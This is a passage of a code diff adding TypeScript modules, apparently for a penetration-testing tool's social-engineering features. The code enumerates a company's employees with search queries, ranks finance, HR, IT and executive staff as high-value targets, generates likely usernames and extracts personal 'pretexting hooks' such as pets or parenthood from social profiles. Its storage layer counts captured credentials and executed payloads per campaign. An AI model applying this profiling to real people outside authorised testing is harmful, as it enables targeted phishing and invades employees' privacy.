+import { SocEngStorage } from "../storage"
+
+/**
+ * Organization reconnaissance namespace.
+ */
+export namespace OrgRecon {
+  // ========== Organization Types ==========
+
+  /**
+   * Organization profile.
+   */
+  export interface Organization {
+    id: string
+    name: string
+    domain: string
+    industry?: string
+    size?: string
+    headquarters?: string
+    locations: string[]
+    website?: string
+    linkedinUrl?: string
+    description?: string
+    employees: Employee[]
+    departments: Department[]
+    hierarchy: OrgHierarchy
+    sources: string[]
+    lastUpdated: number
+  }
+
+  /**
+   * Employee record.
+   */
+  export interface Employee {
+    id: string
+    firstName: string
+    lastName: string
+    email?: string
+    title?: string
+    department?: string
+    phone?: string
+    location?: string
+    manager?: string
+    linkedinUrl?: string
+    bio?: string
+    source: string
+    confidence: "low" | "medium" | "high"
+  }
+
+  /**
+   * Department structure.
+   */
+  export interface Department {
+    name: string
+    head?: string
+    employeeCount?: number
+    subDepartments?: Department[]
+  }
+
+  /**
+   * Organization hierarchy.
+   */
+  export interface OrgHierarchy {
+    executives: Employee[]
+    managers: Employee[]
+    departments: Record<string, Employee[]>
+  }
+
+  // ========== Organization Building ==========
+
+  /**
+   * Create new organization profile.
+   */
+  export function createOrganization(
+    name: string,
+    domain: string
+  ): Organization {
+    return {
+      id: SocEngStorage.createOsintId(),
+      name,
+      domain,
+      locations: [],
+      employees: [],
+      departments: [],
+      hierarchy: {
+        executives: [],
+        managers: [],
+        departments: {},
+      },
+      sources: [],
+      lastUpdated: Date.now(),
+    }
+  }
+
+  /**
+   * Add employee to organization.
+   */
+  export function addEmployee(
+    org: Organization,
+    employee: Omit<Employee, "id">
+  ): Employee {
+    const emp: Employee = {
+      ...employee,
+      id: SocEngStorage.createTargetId(),
+    }
+
+    org.employees.push(emp)
+
+    // Update hierarchy
+    if (isExecutive(emp.title)) {
+      org.hierarchy.executives.push(emp)
+    } else if (isManager(emp.title)) {
+      org.hierarchy.managers.push(emp)
+    }
+
+    if (emp.department) {
+      if (!org.hierarchy.departments[emp.department]) {
+        org.hierarchy.departments[emp.department] = []
+      }
+      org.hierarchy.departments[emp.department].push(emp)
+    }
+
+    org.lastUpdated = Date.now()
+    return emp
+  }
+
+  /**
+   * Check if title is executive level.
+   */
+  function isExecutive(title?: string): boolean {
+    if (!title) return false
+    const lower = title.toLowerCase()
+    const execTitles = [
+      "ceo",
+      "cto",
+      "cfo",
+      "coo",
+      "ciso",
+      "chief",
+      "president",
+      "founder",
+      "owner",
+      "partner",
+      "executive director",
+      "managing director",
+      "general manager",
+      "vp",
+      "vice president",
+    ]
+    return execTitles.some((t) => lower.includes(t))
+  }
+
+  /**
+   * Check if title is manager level.
+   */
+  function isManager(title?: string): boolean {
+    if (!title) return false
+    const lower = title.toLowerCase()
+    const mgrTitles = [
+      "manager",
+      "director",
+      "lead",
+      "head of",
+      "supervisor",
+      "team lead",
+    ]
+    return mgrTitles.some((t) => lower.includes(t))
+  }
+
+  // ========== Employee Enumeration ==========
+
+  /**
+   * Search query templates for employee discovery.
+   */
+  export const EMPLOYEE_SEARCH_QUERIES = {
+    linkedin: `site:linkedin.com/in/ "{company}"`,
+    linkedinCompany: `site:linkedin.com/company/{company}`,
+    googleEmployees: `"{company}" employees`,
+    googleTeam: `"{company}" "our team" OR "meet the team" OR "about us"`,
+    googlePDF: `site:{domain} filetype:pdf "team" OR "staff" OR "directory"`,
+    googleOrgChart: `"{company}" "organization chart" OR "org chart"`,
+    github: `"{company}" site:github.com`,
+    twitter: `"{company}" employees site:twitter.com`,
+    conference: `"{company}" speaker OR presenter conference`,
+  }
+
+  /**
+   * Get search queries for organization.
+   */
+  export function getSearchQueries(
+    company: string,
+    domain?: string
+  ): Record<string, string> {
+    const queries: Record<string, string> = {}
+
+    for (const [key, template] of Object.entries(EMPLOYEE_SEARCH_QUERIES)) {
+      let query = template.replace(/{company}/g, company)
+      if (domain) {
+        query = query.replace(/{domain}/g, domain)
+      }
+      queries[key] = query
+    }
+
+    return queries
+  }
+
+  // ========== High-Value Targets ==========
+
+  /**
+   * High-value target criteria.
+   */
+  export interface TargetCriteria {
+    role?: string[]
+    department?: string[]
+    accessLevel?: "high" | "medium" | "low"
+  }
+
+  /**
+   * Identify high-value targets.
+   */
+  export function identifyHighValueTargets(
+    org: Organization,
+    criteria?: TargetCriteria
+  ): Employee[] {
+    const highValue: Employee[] = []
+
+    // Default high-value roles
+    const hvRoles = criteria?.role || [
+      "finance",
+      "accounting",
+      "hr",
+      "human resources",
+      "payroll",
+      "executive assistant",
+      "admin",
+      "it",
+      "information technology",
+      "security",
+    ]
+
+    // Default high-value departments
+    const hvDepts = criteria?.department || [
+      "finance",
+      "accounting",
+      "human resources",
+      "hr",
+      "executive",
+      "legal",
+      "it",
+      "information technology",
+    ]
+
+    for (const emp of org.employees) {
+      let score = 0
+
+      // Executive = high value
+      if (isExecutive(emp.title)) {
+        score += 3
+      }
+
+      // Manager = medium-high value
+      if (isManager(emp.title)) {
+        score += 2
+      }
+
+      // Check role keywords
+      if (emp.title) {
+        const titleLower = emp.title.toLowerCase()
+        if (hvRoles.some((r) => titleLower.includes(r))) {
+          score += 2
+        }
+      }
+
+      // Check department
+      if (emp.department) {
+        const deptLower = emp.department.toLowerCase()
+        if (hvDepts.some((d) => deptLower.includes(d))) {
+          score += 2
+        }
+      }
+
+      if (score >= 2) {
+        highValue.push(emp)
+      }
+    }
+
+    // Sort by likely value
+    return highValue.sort((a, b) => {
+      const aScore = (isExecutive(a.title) ? 3 : 0) + (isManager(a.title) ? 2 : 0)
+      const bScore = (isExecutive(b.title) ? 3 : 0) + (isManager(b.title) ? 2 : 0)
+      return bScore - aScore
+    })
+  }
+
+  // ========== Department Analysis ==========
+
+  /**
+   * Analyze department structure.
+   */
+  export function analyzeDepartments(org: Organization): DepartmentAnalysis {
+    const analysis: DepartmentAnalysis = {
+      totalDepartments: Object.keys(org.hierarchy.departments).length,
+      departments: [],
+      gaps: [],
+    }
+
+    for (const [name, employees] of Object.entries(org.hierarchy.departments)) {
+      const head = employees.find((e) => isManager(e.title))
+      analysis.departments.push({
+        name,
+        employeeCount: employees.length,
+        head: head?.firstName + " " + head?.lastName,
+        hasManager: !!head,
+      })
+    }
+
+    // Identify gaps (departments with no manager)
+    analysis.gaps = analysis.departments
+      .filter((d) => !d.hasManager)
+      .map((d) => d.name)
+
+    return analysis
+  }
+
+  /**
+   * Department analysis result.
+   */
+  export interface DepartmentAnalysis {
+    totalDepartments: number
+    departments: Array<{
+      name: string
+      employeeCount: number
+      head?: string
+      hasManager: boolean
+    }>
+    gaps: string[]
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format organization profile.
+   */
+  export function formatOrganization(org: Organization): string {
+    const lines: string[] = []
+
+    lines.push(`Organization: ${org.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`Domain: ${org.domain}`)
+    if (org.industry) lines.push(`Industry: ${org.industry}`)
+    if (org.size) lines.push(`Size: ${org.size}`)
+    if (org.headquarters) lines.push(`HQ: ${org.headquarters}`)
+    lines.push("")
+
+    lines.push(`Total Employees Found: ${org.employees.length}`)
+    lines.push(`Executives: ${org.hierarchy.executives.length}`)
+    lines.push(`Managers: ${org.hierarchy.managers.length}`)
+    lines.push(`Departments: ${Object.keys(org.hierarchy.departments).length}`)
+    lines.push("")
+
+    if (org.hierarchy.executives.length > 0) {
+      lines.push("Key Executives:")
+      for (const exec of org.hierarchy.executives.slice(0, 5)) {
+        lines.push(`  • ${exec.firstName} ${exec.lastName} - ${exec.title}`)
+      }
+      lines.push("")
+    }
+
+    lines.push("Departments:")
+    for (const [dept, emps] of Object.entries(org.hierarchy.departments)) {
+      lines.push(`  📁 ${dept}: ${emps.length} employees`)
+    }
+
+    lines.push("")
+    lines.push("Sources:")
+    for (const source of org.sources) {
+      lines.push(`  • ${source}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format employee list.
+   */
+  export function formatEmployeeList(employees: Employee[]): string {
+    const lines: string[] = []
+
+    lines.push("Employee List")
+    lines.push("=".repeat(50))
+
+    for (const emp of employees) {
+      lines.push("")
+      lines.push(`👤 ${emp.firstName} ${emp.lastName}`)
+      if (emp.title) lines.push(`   Title: ${emp.title}`)
+      if (emp.department) lines.push(`   Dept: ${emp.department}`)
+      if (emp.email) lines.push(`   Email: ${emp.email}`)
+      if (emp.linkedinUrl) lines.push(`   LinkedIn: ${emp.linkedinUrl}`)
+      lines.push(`   Confidence: ${emp.confidence}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format high-value targets.
+   */
+  export function formatHighValueTargets(targets: Employee[]): string {
+    const lines: string[] = []
+
+    lines.push("High-Value Targets")
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    for (const target of targets) {
+      const level = isExecutive(target.title)
+        ? "🔴 EXECUTIVE"
+        : isManager(target.title)
+          ? "🟠 MANAGER"
+          : "🟡 KEY ROLE"
+
+      lines.push(`${level}`)
+      lines.push(`  Name: ${target.firstName} ${target.lastName}`)
+      if (target.title) lines.push(`  Title: ${target.title}`)
+      if (target.department) lines.push(`  Department: ${target.department}`)
+      if (target.email) lines.push(`  Email: ${target.email}`)
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/recon/social.ts b/packages/opencode/src/pentest/soceng/recon/social.ts
new file mode 100644
index 00000000000..41cdd00feb1
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/recon/social.ts
@@ -0,0 +1,427 @@
+/**
+ * @fileoverview Social Media Reconnaissance
+ *
+ * Social media intelligence gathering for social engineering.
+ *
+ * @module pentest/soceng/recon/social
+ */
+
+import { SocEngStorage } from "../storage"
+
+/**
+ * Social media reconnaissance namespace.
+ */
+export namespace SocialRecon {
+  // ========== Social Media Types ==========
+
+  /**
+   * Social media platform.
+   */
+  export type Platform =
+    | "linkedin"
+    | "twitter"
+    | "facebook"
+    | "instagram"
+    | "github"
+    | "reddit"
+    | "youtube"
+    | "tiktok"
+
+  /**
+   * Social media profile.
+   */
+  export interface SocialProfile {
+    id: string
+    platform: Platform
+    username: string
+    displayName?: string
+    profileUrl: string
+    bio?: string
+    location?: string
+    followers?: number
+    following?: number
+    posts?: number
+    joinDate?: string
+    verified: boolean
+    lastActive?: string
+    extractedInfo: ExtractedInfo
+    confidence: "low" | "medium" | "high"
+    discoveredAt: number
+  }
+
+  /**
+   * Information extracted from profile.
+   */
+  export interface ExtractedInfo {
+    employer?: string
+    title?: string
+    education?: string[]
+    skills?: string[]
+    interests?: string[]
+    connections?: string[]
+    websites?: string[]
+    emails?: string[]
+    phones?: string[]
+  }
+
+  /**
+   * Social media footprint.
+   */
+  export interface SocialFootprint {
+    targetName: string
+    targetEmail?: string
+    profiles: SocialProfile[]
+    totalPresence: number
+    primaryPlatform?: Platform
+    securityRisks: SecurityRisk[]
+    pretextingHooks: string[]
+    lastUpdated: number
+  }
+
+  /**
+   * Security risk from social media.
+   */
+  export interface SecurityRisk {
+    platform: Platform
+    type: string
+    description: string
+    severity: "low" | "medium" | "high"
+    evidence?: string
+  }
+
+  // ========== Search Queries ==========
+
+  /**
+   * Generate platform-specific search queries.
+   */
+  export function generateSearchQueries(
+    name: string,
+    email?: string,
+    company?: string
+  ): Record<Platform, string> {
+    const queries: Record<Platform, string> = {
+      linkedin: `site:linkedin.com/in/ "${name}"${company ? ` "${company}"` : ""}`,
+      twitter: `"${name}" site:twitter.com${company ? ` "${company}"` : ""}`,
+      facebook: `"${name}" site:facebook.com${company ? ` "${company}"` : ""}`,
+      instagram: `"${name}" site:instagram.com`,
+      github: `"${name}" site:github.com${email ? ` OR "${email}"` : ""}`,
+      reddit: `"${name}" site:reddit.com`,
+      youtube: `"${name}" site:youtube.com`,
+      tiktok: `"${name}" site:tiktok.com`,
+    }
+
+    return queries
+  }
+
+  /**
+   * Generate username permutations.
+   */
+  export function generateUsernames(
+    firstName: string,
+    lastName: string
+  ): string[] {
+    const first = firstName.toLowerCase().replace(/[^a-z]/g, "")
+    const last = lastName.toLowerCase().replace(/[^a-z]/g, "")
+    const fInit = first[0]
+    const lInit = last[0]
+
+    // Common username patterns
+    return [
+      `${first}${last}`,
+      `${first}.${last}`,
+      `${first}_${last}`,
+      `${first}-${last}`,
+      `${fInit}${last}`,
+      `${first}${lInit}`,
+      `${last}${first}`,
+      `${first}${last}1`,
+      `${first}${last}123`,
+      `the${first}${last}`,
+      `real${first}${last}`,
+      first,
+      last,
+    ]
+  }
+
+  // ========== Profile Analysis ==========
+
+  /**
+   * Analyze profile for security risks.
+   */
+  export function analyzeSecurityRisks(profile: SocialProfile): SecurityRisk[] {
+    const risks: SecurityRisk[] = []
+
+    // Check for excessive personal information
+    if (profile.extractedInfo.phones?.length) {
+      risks.push({
+        platform: profile.platform,
+        type: "phone_exposure",
+        description: "Phone number exposed in profile",
+        severity: "high",
+        evidence: profile.extractedInfo.phones[0],
+      })
+    }
+
+    if (profile.extractedInfo.emails?.length) {
+      risks.push({
+        platform: profile.platform,
+        type: "email_exposure",
+        description: "Email address exposed in profile",
+        severity: "medium",
+        evidence: profile.extractedInfo.emails[0],
+      })
+    }
+
+    // Check location exposure
+    if (profile.location) {
+      risks.push({
+        platform: profile.platform,
+        type: "location_exposure",
+        description: "Location information exposed",
+        severity: "low",
+        evidence: profile.location,
+      })
+    }
+
+    // Check for employer/role exposure
+    if (profile.extractedInfo.employer || profile.extractedInfo.title) {
+      risks.push({
+        platform: profile.platform,
+        type: "work_exposure",
+        description: "Employer/role information exposed",
+        severity: "low",
+        evidence: `${profile.extractedInfo.employer} - ${profile.extractedInfo.title}`,
+      })
+    }
+
+    return risks
+  }
+
+  /**
+   * Extract pretexting hooks from profile.
+   */
+  export function extractPretextingHooks(profile: SocialProfile): string[] {
+    const hooks: string[] = []
+
+    // Education hooks
+    if (profile.extractedInfo.education?.length) {
+      hooks.push(`Education: ${profile.extractedInfo.education[0]}`)
+    }
+
+    // Interest hooks
+    if (profile.extractedInfo.interests?.length) {
+      hooks.push(`Interests: ${profile.extractedInfo.interests.slice(0, 3).join(", ")}`)
+    }
+
+    // Skills hooks
+    if (profile.extractedInfo.skills?.length) {
+      hooks.push(`Skills: ${profile.extractedInfo.skills.slice(0, 3).join(", ")}`)
+    }
+
+    // Location hooks
+    if (profile.location) {
+      hooks.push(`Location: ${profile.location}`)
+    }
+
+    // Bio hooks
+    if (profile.bio && profile.bio.length > 0) {
+      // Extract potential hooks from bio
+      const bioLower = profile.bio.toLowerCase()
+
+      if (bioLower.includes("coffee") || bioLower.includes("☕")) {
+        hooks.push("Likes coffee")
+      }
+      if (bioLower.includes("dog") || bioLower.includes("🐕") || bioLower.includes("🐶")) {
+        hooks.push("Has/likes dogs")
+      }
+      if (bioLower.includes("cat") || bioLower.includes("🐱") || bioLower.includes("🐈")) {
+        hooks.push("Has/likes cats")
+      }
+      if (bioLower.includes("parent") || bioLower.includes("dad") || bioLower.includes("mom")) {
+        hooks.push("Is a parent")
+      }
+      if (bioLower.includes("travel") || bioLower.includes("✈️")) {
+        hooks.push("Likes traveling")
+      }
+    }
+
+    return hooks
+  }
+
+  // ========== Footprint Building ==========
+
+  /**
+   * Create social footprint.
+   */
+  export function createFootprint(targetName: string): SocialFootprint {
+    return {
+      targetName,
+      profiles: [],
+      totalPresence: 0,
+      securityRisks: [],
+      pretextingHooks: [],
+      lastUpdated: Date.now(),
+    }
+  }
+
+  /**
+   * Add profile to footprint.
+   */
+  export function addProfile(
+    footprint: SocialFootprint,
+    profile: SocialProfile
+  ): void {
+    footprint.profiles.push(profile)
+    footprint.totalPresence++
+
+    // Update security risks
+    const risks = analyzeSecurityRisks(profile)
+    footprint.securityRisks.push(...risks)
+
+    // Update pretexting hooks
+    const hooks = extractPretextingHooks(profile)
+    footprint.pretextingHooks.push(...hooks)
+
+    // Deduplicate hooks
+    footprint.pretextingHooks = [...new Set(footprint.pretextingHooks)]
+
+    // Determine primary platform (most followers/connections)
+    const sorted = [...footprint.profiles].sort(
+      (a, b) => (b.followers || 0) - (a.followers || 0)
+    )
+    if (sorted.length > 0) {
+      footprint.primaryPlatform = sorted[0].platform
+    }
+
+    footprint.lastUpdated = Date.now()
+  }
+
+  // ========== Platform-Specific Parsing ==========
+
+  /**
+   * LinkedIn profile URL patterns.
+   */
+  export const LINKEDIN_PATTERNS = {
+    profile: /linkedin\.com\/in\/([a-zA-Z0-9_-]+)/,
+    company: /linkedin\.com\/company\/([a-zA-Z0-9_-]+)/,
+  }
+
+  /**
+   * Twitter/X profile URL patterns.
+   */
+  export const TWITTER_PATTERNS = {
+    profile: /(?:twitter|x)\.com\/([a-zA-Z0-9_]+)/,
+  }
+
+  /**
+   * GitHub profile URL patterns.
+   */
+  export const GITHUB_PATTERNS = {
+    profile: /github\.com\/([a-zA-Z0-9_-]+)/,
+    repo: /github\.com\/([a-zA-Z0-9_-]+)\/([a-zA-Z0-9_-]+)/,
+  }
+
+  /**
+   * Extract username from URL.
+   */
+  export function extractUsername(url: string, platform: Platform): string | null {
+    let match: RegExpMatchArray | null = null
+
+    switch (platform) {
+      case "linkedin":
+        match = url.match(LINKEDIN_PATTERNS.profile)
+        break
+      case "twitter":
+        match = url.match(TWITTER_PATTERNS.profile)
+        break
+      case "github":
+        match = url.match(GITHUB_PATTERNS.profile)
+        break
+      default:
+        // Generic pattern
+        match = url.match(/\/([a-zA-Z0-9_.-]+)\/?$/)
+    }
+
+    return match ? match[1] : null
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format social footprint.
+   */
+  export function formatFootprint(footprint: SocialFootprint): string {
+    const lines: string[] = []
+
+    lines.push(`Social Media Footprint: ${footprint.targetName}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Total Profiles Found: ${footprint.totalPresence}`)
+    if (footprint.primaryPlatform) {
+      lines.push(`Primary Platform: ${footprint.primaryPlatform}`)
+    }
+    lines.push("")
+
+    // Profiles
+    lines.push("Profiles:")
+    for (const profile of footprint.profiles) {
+      const verified = profile.verified ? " ✓" : ""
+      lines.push(`  📱 ${profile.platform}${verified}`)
+      lines.push(`     Username: ${profile.username}`)
+      lines.push(`     URL: ${profile.profileUrl}`)
+      if (profile.followers) {
+        lines.push(`     Followers: ${profile.followers}`)
+      }
+    }
+    lines.push("")
+
+    // Security Risks
+    if (footprint.securityRisks.length > 0) {
+      lines.push("Security Risks:")
+      for (const risk of footprint.securityRisks) {
+        const icon = risk.severity === "high" ? "🔴" : risk.severity === "medium" ? "🟠" : "🟡"
+        lines.push(`  ${icon} [${risk.platform}] ${risk.description}`)
+      }
+      lines.push("")
+    }
+
+    // Pretexting Hooks
+    if (footprint.pretextingHooks.length > 0) {
+      lines.push("Pretexting Hooks:")
+      for (const hook of footprint.pretextingHooks) {
+        lines.push(`  💡 ${hook}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format profile.
+   */
+  export function formatProfile(profile: SocialProfile): string {
+    const lines: string[] = []
+
+    lines.push(`Profile: ${profile.platform}`)
+    lines.push("=".repeat(40))
+    lines.push(`Username: ${profile.username}`)
+    lines.push(`URL: ${profile.profileUrl}`)
+    if (profile.displayName) lines.push(`Display Name: ${profile.displayName}`)
+    if (profile.bio) lines.push(`Bio: ${profile.bio}`)
+    if (profile.location) lines.push(`Location: ${profile.location}`)
+    if (profile.followers) lines.push(`Followers: ${profile.followers}`)
+    lines.push(`Verified: ${profile.verified ? "Yes" : "No"}`)
+    lines.push(`Confidence: ${profile.confidence}`)
+
+    if (profile.extractedInfo.employer) {
+      lines.push("")
+      lines.push("Extracted Information:")
+      lines.push(`  Employer: ${profile.extractedInfo.employer}`)
+      if (profile.extractedInfo.title) {
+        lines.push(`  Title: ${profile.extractedInfo.title}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/storage.ts b/packages/opencode/src/pentest/soceng/storage.ts
new file mode 100644
index 00000000000..498167d3f48
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/storage.ts
@@ -0,0 +1,668 @@
+/**
+ * @fileoverview Social Engineering Storage
+ *
+ * Persistence layer for social engineering data.
+ *
+ * @module pentest/soceng/storage
+ */
+
+import { SocEngTypes } from "./types"
+import * as crypto from "crypto"
+
+/**
+ * Social engineering storage namespace.
+ */
+export namespace SocEngStorage {
+  // ========== Storage Configuration ==========
+
+  /**
+   * Storage backend interface.
+   */
+  export interface StorageBackend {
+    get<T>(key: string): Promise<T | null>
+    set<T>(key: string, value: T): Promise<void>
+    delete(key: string): Promise<void>
+    list(prefix: string): Promise<string[]>
+    clear(): Promise<void>
+  }
+
+  /**
+   * Memory storage backend.
+   */
+  class MemoryStorage implements StorageBackend {
+    private data = new Map<string, unknown>()
+
+    async get<T>(key: string): Promise<T | null> {
+      return (this.data.get(key) as T) ?? null
+    }
+
+    async set<T>(key: string, value: T): Promise<void> {
+      this.data.set(key, value)
+    }
+
+    async delete(key: string): Promise<void> {
+      this.data.delete(key)
+    }
+
+    async list(prefix: string): Promise<string[]> {
+      return Array.from(this.data.keys()).filter((k) => k.startsWith(prefix))
+    }
+
+    async clear(): Promise<void> {
+      this.data.clear()
+    }
+  }
+
+  let storage: StorageBackend = new MemoryStorage()
+
+  /**
+   * Set storage backend.
+   */
+  export function setBackend(backend: StorageBackend): void {
+    storage = backend
+  }
+
+  // ========== ID Generation ==========
+
+  /**
+   * Generate unique ID.
+   */
+  export function generateId(prefix: string = ""): string {
+    const timestamp = Date.now().toString(36)
+    const random = crypto.randomBytes(8).toString("hex")
+    return prefix ? `${prefix}-${timestamp}-${random}` : `${timestamp}-${random}`
+  }
+
+  /**
+   * Create campaign ID.
+   */
+  export function createCampaignId(): string {
+    return generateId("camp")
+  }
+
+  /**
+   * Create target ID.
+   */
+  export function createTargetId(): string {
+    return generateId("tgt")
+  }
+
+  /**
+   * Create template ID.
+   */
+  export function createTemplateId(): string {
+    return generateId("tpl")
+  }
+
+  /**
+   * Create landing page ID.
+   */
+  export function createLandingPageId(): string {
+    return generateId("lp")
+  }
+
+  /**
+   * Create page ID (alias for createLandingPageId).
+   */
+  export function createPageId(): string {
+    return generateId("page")
+  }
+
+  /**
+   * Create payload ID.
+   */
+  export function createPayloadId(): string {
+    return generateId("pay")
+  }
+
+  /**
+   * Create event ID.
+   */
+  export function createEventId(): string {
+    return generateId("evt")
+  }
+
+  /**
+   * Create recon ID.
+   */
+  export function createReconId(): string {
+    return generateId("recon")
+  }
+
+  /**
+   * Create session ID.
+   */
+  export function createSessionId(): string {
+    return generateId("sess")
+  }
+
+  /**
+   * Create OSINT ID.
+   */
+  export function createOsintId(): string {
+    return generateId("osint")
+  }
+
+  /**
+   * Create persona ID.
+   */
+  export function createPersonaId(): string {
+    return generateId("persona")
+  }
+
+  /**
+   * Create pretext ID.
+   */
+  export function createPretextId(): string {
+    return generateId("pretext")
+  }
+
+  /**
+   * Create script ID.
+   */
+  export function createScriptId(): string {
+    return generateId("script")
+  }
+
+  // ========== Campaign Storage ==========
+
+  const CAMPAIGNS_PREFIX = "soceng:campaigns:"
+  const RESULTS_PREFIX = "soceng:results:"
+  const EVENTS_PREFIX = "soceng:events:"
+
+  /**
+   * Store campaign.
+   */
+  export async function storeCampaign(
+    campaign: SocEngTypes.Campaign
+  ): Promise<void> {
+    await storage.set(`${CAMPAIGNS_PREFIX}${campaign.id}`, campaign)
+  }
+
+  /**
+   * Get campaign.
+   */
+  export async function getCampaign(
+    campaignId: string
+  ): Promise<SocEngTypes.Campaign | null> {
+    return storage.get<SocEngTypes.Campaign>(`${CAMPAIGNS_PREFIX}${campaignId}`)
+  }
+
+  /**
+   * List campaigns.
+   */
+  export async function listCampaigns(): Promise<SocEngTypes.Campaign[]> {
+    const keys = await storage.list(CAMPAIGNS_PREFIX)
+    const campaigns: SocEngTypes.Campaign[] = []
+
+    for (const key of keys) {
+      const campaign = await storage.get<SocEngTypes.Campaign>(key)
+      if (campaign) campaigns.push(campaign)
+    }
+
+    return campaigns.sort((a, b) => b.createdAt - a.createdAt)
+  }
+
+  /**
+   * Get all campaigns (alias for listCampaigns).
+   */
+  export async function getAllCampaigns(): Promise<SocEngTypes.Campaign[]> {
+    return listCampaigns()
+  }
+
+  /**
+   * Delete campaign.
+   */
+  export async function deleteCampaign(campaignId: string): Promise<void> {
+    await storage.delete(`${CAMPAIGNS_PREFIX}${campaignId}`)
+    await storage.delete(`${RESULTS_PREFIX}${campaignId}`)
+
+    // Delete associated events
+    const eventKeys = await storage.list(`${EVENTS_PREFIX}${campaignId}:`)
+    for (const key of eventKeys) {
+      await storage.delete(key)
+    }
+  }
+
+  /**
+   * Update campaign status.
+   */
+  export async function updateCampaignStatus(
+    campaignId: string,
+    status: SocEngTypes.CampaignStatus
+  ): Promise<void> {
+    const campaign = await getCampaign(campaignId)
+    if (campaign) {
+      campaign.status = status
+      if (status === "active" && !campaign.startedAt) {
+        campaign.startedAt = Date.now()
+      }
+      if (status === "completed") {
+        campaign.completedAt = Date.now()
+      }
+      await storeCampaign(campaign)
+    }
+  }
+
+  // ========== Results Storage ==========
+
+  /**
+   * Store campaign results.
+   */
+  export async function storeResults(
+    results: SocEngTypes.CampaignResults
+  ): Promise<void> {
+    await storage.set(`${RESULTS_PREFIX}${results.campaignId}`, results)
+  }
+
+  /**
+   * Get campaign results.
+   */
+  export async function getResults(
+    campaignId: string
+  ): Promise<SocEngTypes.CampaignResults | null> {
+    return storage.get<SocEngTypes.CampaignResults>(`${RESULTS_PREFIX}${campaignId}`)
+  }
+
+  /**
+   * Initialize empty results.
+   */
+  export function initializeResults(campaignId: string): SocEngTypes.CampaignResults {
+    return {
+      campaignId,
+      totalTargets: 0,
+      emailsSent: 0,
+      emailsDelivered: 0,
+      emailsBounced: 0,
+      emailsOpened: 0,
+      uniqueOpens: 0,
+      linksClicked: 0,
+      uniqueClicks: 0,
+      attachmentsOpened: 0,
+      credentialsCaptured: 0,
+      formsSubmitted: 0,
+      payloadsExecuted: 0,
+      reportedAsPhish: 0,
+      trainingCompleted: 0,
+      timeline: [],
+    }
+  }
+
+  // ========== Event Storage ==========
+
+  /**
+   * Store timeline event.
+   */
+  export async function storeEvent(
+    event: SocEngTypes.TimelineEvent
+  ): Promise<void> {
+    await storage.set(
+      `${EVENTS_PREFIX}${event.campaignId}:${event.id}`,
+      event
+    )
+
+    // Update results
+    const results = await getResults(event.campaignId) || initializeResults(event.campaignId)
+    results.timeline.push(event)
+    updateResultsFromEvent(results, event)
+    await storeResults(results)
+  }
+
+  /**
+   * Get events for campaign.
+   */
+  export async function getEvents(
+    campaignId: string
+  ): Promise<SocEngTypes.TimelineEvent[]> {
+    const keys = await storage.list(`${EVENTS_PREFIX}${campaignId}:`)
+    const events: SocEngTypes.TimelineEvent[] = []
+
+    for (const key of keys) {
+      const event = await storage.get<SocEngTypes.TimelineEvent>(key)
+      if (event) events.push(event)
+    }
+
+    return events.sort((a, b) => a.timestamp - b.timestamp)
+  }
+
+  /**
+   * Get events for campaign (alias for getEvents).
+   */
+  export async function getEventsForCampaign(
+    campaignId: string
+  ): Promise<SocEngTypes.TimelineEvent[]> {
+    return getEvents(campaignId)
+  }
+
+  /**
+   * Update results from event.
+   */
+  function updateResultsFromEvent(
+    results: SocEngTypes.CampaignResults,
+    event: SocEngTypes.TimelineEvent
+  ): void {
+    switch (event.type) {
+      case "email_sent":
+        results.emailsSent++
+        break
+      case "email_opened":
+        results.emailsOpened++
+        break
+      case "link_clicked":
+        results.linksClicked++
+        break
+      case "attachment_opened":
+        results.attachmentsOpened++
+        break
+      case "credential_submitted":
+        results.credentialsCaptured++
+        break
+      case "form_submitted":
+        results.formsSubmitted++
+        break
+      case "payload_executed":
+        results.payloadsExecuted++
+        break
+      case "reported_phish":
+        results.reportedAsPhish++
+        break
+      case "training_completed":
+        results.trainingCompleted++
+        break
+    }
+  }
+
+  // ========== Template Storage ==========
+
+  const TEMPLATES_PREFIX = "soceng:templates:"
+
+  /**
+   * Store email template.
+   */
+  export async function storeTemplate(
+    template: SocEngTypes.EmailTemplate
+  ): Promise<void> {
+    await storage.set(`${TEMPLATES_PREFIX}${template.id}`, template)
+  }
+
+  /**
+   * Get email template.
+   */
+  export async function getTemplate(
+    templateId: string
+  ): Promise<SocEngTypes.EmailTemplate | null> {
+    return storage.get<SocEngTypes.EmailTemplate>(`${TEMPLATES_PREFIX}${templateId}`)
+  }
+
+  /**
+   * List email templates.
+   */
+  export async function listTemplates(): Promise<SocEngTypes.EmailTemplate[]> {
+    const keys = await storage.list(TEMPLATES_PREFIX)
+    const templates: SocEngTypes.EmailTemplate[] = []
+
+    for (const key of keys) {
+      const template = await storage.get<SocEngTypes.EmailTemplate>(key)
+      if (template) templates.push(template)
+    }
+
+    return templates.sort((a, b) => b.createdAt - a.createdAt)
+  }
+
+  // ========== Landing Page Storage ==========
+
+  const LANDING_PAGES_PREFIX = "soceng:landing-pages:"
+
+  /**
+   * Store landing page.
+   */
+  export async function storeLandingPage(
+    page: SocEngTypes.LandingPage
+  ): Promise<void> {
+    await storage.set(`${LANDING_PAGES_PREFIX}${page.id}`, page)
+  }
+
+  /**
+   * Get landing page.
+   */
+  export async function getLandingPage(
+    pageId: string
+  ): Promise<SocEngTypes.LandingPage | null> {
+    return storage.get<SocEngTypes.LandingPage>(`${LANDING_PAGES_PREFIX}${pageId}`)
+  }
+
+  /**
+   * List landing pages.
+   */
+  export async function listLandingPages(): Promise<SocEngTypes.LandingPage[]> {
+    const keys = await storage.list(LANDING_PAGES_PREFIX)
+    const pages: SocEngTypes.LandingPage[] = []
+
+    for (const key of keys) {
+      const page = await storage.get<SocEngTypes.LandingPage>(key)
+      if (page) pages.push(page)
+    }
+
+    return pages
